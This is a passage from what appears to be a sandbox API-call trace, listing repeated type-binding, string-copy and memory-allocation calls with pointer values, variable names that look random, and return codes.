_Dst=0x345c9c) returned 0x0 [0060.414] CRetailMalloc_Free () returned 0x6b30301 [0060.414] ITypeComp:RemoteBind (in: This=0x87ce890, szName="pfUhlJ", lHashVal=0x101cc3, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc4) returned 0x0 [0060.414] ITypeComp:RemoteBind (in: This=0x87ce668, szName="pfUhlJ", lHashVal=0x101cc3, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc4) returned 0x0 [0060.415] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="pfUhlJ", lHashVal=0x101cc3, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc4) returned 0x0 [0060.415] ITypeComp:RemoteBind (in: This=0x87cef08, szName="pfUhlJ", lHashVal=0x101cc3, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc4) returned 0x0 [0060.415] CRetailMalloc_Alloc () returned 0x87fc638 [0060.415] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f06c6 | out: _Dst=0x87fc638) returned 0x0 [0060.416] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.416] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_pfUhlJ", lHashVal=0x10976c, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.416] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f06c6 | out: _Dst=0x345c9c) returned 0x0 [0060.416] CRetailMalloc_Free () returned 0x6b30301 [0060.416] ITypeComp:RemoteBind (in: This=0x87ce890, szName="TYXdg", lHashVal=0x10d755, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc6) returned 0x0 [0060.417] ITypeComp:RemoteBind (in: This=0x87ce668, szName="TYXdg", lHashVal=0x10d755, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc6) returned 0x0 [0060.417] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="TYXdg", lHashVal=0x10d755, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc6) returned 0x0 [0060.417] ITypeComp:RemoteBind (in: This=0x87cef08, szName="TYXdg", lHashVal=0x10d755, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc6) returned 0x0 [0060.417] CRetailMalloc_Alloc () returned 0x87fc638 [0060.417] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f06ea | out: _Dst=0x87fc638) returned 0x0 [0060.418] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.418] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_TYXdg", lHashVal=0x109b42, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.418] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f06ea | out: _Dst=0x345c9c) returned 0x0 [0060.418] CRetailMalloc_Free () returned 0x6b30301 [0060.418] ITypeComp:RemoteBind (in: This=0x87ce890, szName="o4jTi8", lHashVal=0x1084fc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc8) returned 0x0 [0060.419] ITypeComp:RemoteBind (in: This=0x87ce668, szName="o4jTi8", lHashVal=0x1084fc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc8) returned 0x0 [0060.419] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="o4jTi8", lHashVal=0x1084fc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc8) returned 0x0 [0060.419] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f070e | out: _Dst=0x87fc638) returned 0x0 [0060.419] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f070e | out: _Dst=0x345c9c) returned 0x0 [0060.419] CRetailMalloc_Free () returned 0x6b30301 [0060.420] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0732 | out: _Dst=0x87504e0) returned 0x0 [0060.420] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0732 | out: _Dst=0x345c9c) returned 0x0 [0060.420] CRetailMalloc_Free () returned 0xb820401 [0060.420] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f075a | out: _Dst=0x87fc638) returned 0x0 [0060.420] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f075a | out: _Dst=0x345c9c) returned 0x0 [0060.420] CRetailMalloc_Free () returned 0x6b30301 [0060.420] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f077e | out: _Dst=0x87fc638) returned 0x0 [0060.420] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f077e | out: _Dst=0x345c9c) returned 0x0 [0060.420] CRetailMalloc_Free () returned 0x6b30301 [0060.421] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f07c6 | out: _Dst=0x87504e0) returned 0x0 [0060.421] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f07c6 | out: _Dst=0x345c9c) returned 0x0 [0060.421] CRetailMalloc_Free () returned 0xb820401 [0060.421] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f07a2 | out: _Dst=0x87fc638) returned 0x0 [0060.421] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f07a2 | out: _Dst=0x345c9c) returned 0x0 [0060.421] CRetailMalloc_Free () returned 0x6b30301 [0060.421] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f07ee | out: _Dst=0x87fc638) returned 0x0 [0060.421] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f07ee | out: _Dst=0x345c9c) returned 0x0 [0060.421] CRetailMalloc_Free () returned 0x6b30301 [0060.421] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0816 | out: _Dst=0x87fc638) returned 0x0 [0060.422] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0816 | out: _Dst=0x345c9c) returned 0x0 [0060.422] CRetailMalloc_Free () returned 0x6b30301 [0060.422] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f083a | out: _Dst=0x87504e0) returned 0x0 [0060.422] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f083a | out: _Dst=0x345c9c) returned 0x0 [0060.422] CRetailMalloc_Free () returned 0xb820401 [0060.422] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0862 | out: _Dst=0x87fc638) returned 0x0 [0060.422] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0862 | out: _Dst=0x345c9c) returned 0x0 [0060.422] CRetailMalloc_Free () returned 0x6b30301 [0060.422] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f088a | out: _Dst=0x87fc638) returned 0x0 [0060.422] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f088a | out: _Dst=0x345c9c) returned 0x0 [0060.422] CRetailMalloc_Free () returned 0x6b30301 [0060.423] CRetailMalloc_Alloc () returned 0x87fc638 [0060.423] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f08ae | out: _Dst=0x87fc638) returned 0x0 [0060.423] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f08ae | out: _Dst=0x345c9c) returned 0x0 [0060.423] CRetailMalloc_Free () returned 0x6b30301 [0060.423] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f08d2 | out: _Dst=0x87fc638) returned 0x0 [0060.423] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f08d2 | out: _Dst=0x345c9c) returned 0x0 [0060.423] CRetailMalloc_Free () returned 0x6b30301 [0060.423] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f08f6 | out: _Dst=0x87fc638) returned 0x0 [0060.424] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f08f6 | out: _Dst=0x345c9c) returned 0x0 [0060.424] CRetailMalloc_Free () returned 0x6b30301 [0060.424] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f091a | out: _Dst=0x87fc638) returned 0x0 [0060.424] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f091a | out: _Dst=0x345c9c) returned 0x0 [0060.424] CRetailMalloc_Free () returned 0x6b30301 [0060.424] CRetailMalloc_Realloc () returned 0x88046d0 [0060.424] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0966 | out: _Dst=0x87fc638) returned 0x0 [0060.424] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0966 | out: _Dst=0x345c9c) returned 0x0 [0060.424] CRetailMalloc_Free () returned 0x6b30301 [0060.425] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f093e | out: _Dst=0x87fc638) returned 0x0 [0060.425] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f093e | out: _Dst=0x345c9c) returned 0x0 [0060.425] CRetailMalloc_Free () returned 0x6b30301 [0060.425] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f098e | out: _Dst=0x87fc638) returned 0x0 [0060.425] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f098e | out: _Dst=0x345c9c) returned 0x0 [0060.425] CRetailMalloc_Free () returned 0x6b30301 [0060.425] _mbscpy_s (in: _Dst=0x874a4a0, _DstSizeInBytes=0xa, _Src=0x56f09b2 | out: _Dst=0x874a4a0) returned 0x0 [0060.425] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f09b2 | out: _Dst=0x345c9c) returned 0x0 [0060.425] CRetailMalloc_Free () returned 0xcaa0401 [0060.425] CRetailMalloc_Realloc () returned 0x8804628 [0060.426] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f09da | out: _Dst=0x87504c0) returned 0x0 [0060.426] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f09da | out: _Dst=0x345c9c) returned 0x0 [0060.426] CRetailMalloc_Free () returned 0xa20401 [0060.426] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f0a02 | out: _Dst=0x87504c0) returned 0x0 [0060.426] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0a02 | out: _Dst=0x345c9c) returned 0x0 [0060.426] CRetailMalloc_Free () returned 0xa20401 [0060.426] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f0a2a | out: _Dst=0x87504c0) returned 0x0 [0060.426] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0a2a | out: _Dst=0x345c9c) returned 0x0 [0060.426] CRetailMalloc_Free () returned 0xa20401 [0060.427] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0a52 | out: _Dst=0x87fc638) returned 0x0 [0060.427] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0a52 | out: _Dst=0x345c9c) returned 0x0 [0060.427] CRetailMalloc_Free () returned 0x6b30301 [0060.427] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f0a7a | out: _Dst=0x87fc638) returned 0x0 [0060.427] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f0a7a | out: _Dst=0x345c9c) returned 0x0 [0060.427] CRetailMalloc_Free () returned 0x6b30301 [0060.427] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f0a9e | out: _Dst=0x87504c0) returned 0x0 [0060.427] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0a9e | out: _Dst=0x345c9c) returned 0x0 [0060.427] CRetailMalloc_Free () returned 0xa20401 [0060.428] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0aee | out: _Dst=0x87fc638) returned 0x0 [0060.428] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0aee | out: _Dst=0x345c9c) returned 0x0 [0060.428] CRetailMalloc_Realloc () returned 0x7426110 [0060.428] CRetailMalloc_Free () returned 0x6b30301 [0060.428] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0ac6 | out: _Dst=0x87fc638) returned 0x0 [0060.428] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0ac6 | out: _Dst=0x345c9c) returned 0x0 [0060.428] CRetailMalloc_Free () returned 0x6b30301 [0060.428] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0b12 | out: _Dst=0x87fc638) returned 0x0 [0060.428] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0b12 | out: _Dst=0x345c9c) returned 0x0 [0060.428] CRetailMalloc_Free () returned 0x6b30301 [0060.429] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0b36 | out: _Dst=0x87fc638) returned 0x0 [0060.429] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0b36 | out: _Dst=0x345c9c) returned 0x0 [0060.429] CRetailMalloc_Free () returned 0x6b30301 [0060.429] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f0b5e | out: _Dst=0x87fc638) returned 0x0 [0060.429] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f0b5e | out: _Dst=0x345c9c) returned 0x0 [0060.429] CRetailMalloc_Free () returned 0x6b30301 [0060.429] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0b82 | out: _Dst=0x87fc638) returned 0x0 [0060.429] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0b82 | out: _Dst=0x345c9c) returned 0x0 [0060.429] CRetailMalloc_Free () returned 0x6b30301 [0060.429] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f0bce | out: _Dst=0x87504c0) returned 0x0 [0060.429] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0bce | out: _Dst=0x345c9c) returned 0x0 [0060.430] CRetailMalloc_Free () returned 0xa20401 [0060.430] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f0baa | out: _Dst=0x87fc638) returned 0x0 [0060.430] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f0baa | out: _Dst=0x345c9c) returned 0x0 [0060.430] CRetailMalloc_Free () returned 0x6b30301 [0060.430] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0bf6 | out: _Dst=0x87fc638) returned 0x0 [0060.430] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0bf6 | out: _Dst=0x345c9c) returned 0x0 [0060.430] CRetailMalloc_Free () returned 0x6b30301 [0060.430] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0c42 | out: _Dst=0x87fc638) returned 0x0 [0060.431] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0c42 | out: _Dst=0x345c9c) returned 0x0 [0060.431] CRetailMalloc_Free () returned 0x6b30301 [0060.431] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x56f0c1a | out: _Dst=0x87504c0) returned 0x0 [0060.431] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0c1a | out: _Dst=0x345c9c) returned 0x0 [0060.431] CRetailMalloc_Free () returned 0xa20401 [0060.431] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0c66 | out: _Dst=0x87fc638) returned 0x0 [0060.431] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0c66 | out: _Dst=0x345c9c) returned 0x0 [0060.431] CRetailMalloc_Free () returned 0x6b30301 [0060.431] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0c8a | out: _Dst=0x87fc638) returned 0x0 [0060.431] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0c8a | out: _Dst=0x345c9c) returned 0x0 [0060.431] CRetailMalloc_Free () returned 0x6b30301 [0060.432] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0cae | out: _Dst=0x87fc638) returned 0x0 [0060.432] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0cae | out: _Dst=0x345c9c) returned 0x0 [0060.432] CRetailMalloc_Free () returned 0x6b30301 [0060.432] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0cd2 | out: _Dst=0x87fc638) returned 0x0 [0060.432] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0cd2 | out: _Dst=0x345c9c) returned 0x0 [0060.432] CRetailMalloc_Free () returned 0x6b30301 [0060.432] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0cfa | out: _Dst=0x87fc638) returned 0x0 [0060.441] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0cfa | out: _Dst=0x345c9c) returned 0x0 [0060.441] CRetailMalloc_Free () returned 0x6b30301 [0060.441] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0d22 | out: _Dst=0x87504e0) returned 0x0 [0060.441] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0d22 | out: _Dst=0x345c9c) returned 0x0 [0060.442] CRetailMalloc_Free () returned 0xb820401 [0060.442] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0d4a | out: _Dst=0x87504e0) returned 0x0 [0060.442] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0d4a | out: _Dst=0x345c9c) returned 0x0 [0060.442] CRetailMalloc_Free () returned 0xb820401 [0060.442] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0d72 | out: _Dst=0x87fc638) returned 0x0 [0060.442] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0d72 | out: _Dst=0x345c9c) returned 0x0 [0060.442] CRetailMalloc_Free () returned 0x6b30301 [0060.442] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0dbe | out: _Dst=0x87fc638) returned 0x0 [0060.442] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0dbe | out: _Dst=0x345c9c) returned 0x0 [0060.442] CRetailMalloc_Free () returned 0x6b30301 [0060.443] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0d96 | out: _Dst=0x87504e0) returned 0x0 [0060.443] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0d96 | out: _Dst=0x345c9c) returned 0x0 [0060.443] CRetailMalloc_Free () returned 0xb820401 [0060.444] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0de2 | out: _Dst=0x87fc638) returned 0x0 [0060.444] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0de2 | out: _Dst=0x345c9c) returned 0x0 [0060.444] CRetailMalloc_Free () returned 0x6b30301 [0060.444] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0e06 | out: _Dst=0x87504e0) returned 0x0 [0060.444] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0e06 | out: _Dst=0x345c9c) returned 0x0 [0060.444] CRetailMalloc_Free () returned 0xb820401 [0060.445] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0e2e | out: _Dst=0x87fc638) returned 0x0 [0060.445] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0e2e | out: _Dst=0x345c9c) returned 0x0 [0060.445] CRetailMalloc_Free () returned 0x6b30301 [0060.445] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0e52 | out: _Dst=0x87fc638) returned 0x0 [0060.445] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0e52 | out: _Dst=0x345c9c) returned 0x0 [0060.445] CRetailMalloc_Free () returned 0x6b30301 [0060.445] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0e7a | out: _Dst=0x87fc638) returned 0x0 [0060.445] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0e7a | out: _Dst=0x345c9c) returned 0x0 [0060.445] CRetailMalloc_Free () returned 0x6b30301 [0060.446] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0e9e | out: _Dst=0x87fc638) returned 0x0 [0060.446] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0e9e | out: _Dst=0x345c9c) returned 0x0 [0060.446] CRetailMalloc_Free () returned 0x6b30301 [0060.446] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0ec2 | out: _Dst=0x87504e0) returned 0x0 [0060.446] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0ec2 | out: _Dst=0x345c9c) returned 0x0 [0060.446] CRetailMalloc_Free () returned 0xb820401 [0060.446] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0eea | out: _Dst=0x87fc638) returned 0x0 [0060.446] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0eea | out: _Dst=0x345c9c) returned 0x0 [0060.446] CRetailMalloc_Free () returned 0x6b30301 [0060.447] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0f0e | out: _Dst=0x87fc638) returned 0x0 [0060.447] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0f0e | out: _Dst=0x345c9c) returned 0x0 [0060.447] CRetailMalloc_Free () returned 0x6b30301 [0060.447] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0f32 | out: _Dst=0x87fc638) returned 0x0 [0060.447] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0f32 | out: _Dst=0x345c9c) returned 0x0 [0060.447] CRetailMalloc_Free () returned 0x6b30301 [0060.447] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0f56 | out: _Dst=0x87504e0) returned 0x0 [0060.447] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0f56 | out: _Dst=0x345c9c) returned 0x0 [0060.447] CRetailMalloc_Free () returned 0xb820401 [0060.448] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0f7e | out: _Dst=0x87fc638) returned 0x0 [0060.448] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0f7e | out: _Dst=0x345c9c) returned 0x0 [0060.448] CRetailMalloc_Free () returned 0x6b30301 [0060.448] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f0fa2 | out: _Dst=0x87fc638) returned 0x0 [0060.448] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f0fa2 | out: _Dst=0x345c9c) returned 0x0 [0060.448] CRetailMalloc_Free () returned 0x6b30301 [0060.449] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0fc6 | out: _Dst=0x87fc638) returned 0x0 [0060.449] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0fc6 | out: _Dst=0x345c9c) returned 0x0 [0060.449] CRetailMalloc_Free () returned 0x6b30301 [0060.449] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0fea | out: _Dst=0x87fc638) returned 0x0 [0060.449] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0fea | out: _Dst=0x345c9c) returned 0x0 [0060.449] CRetailMalloc_Free () returned 0x6b30301 [0060.449] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f100e | out: 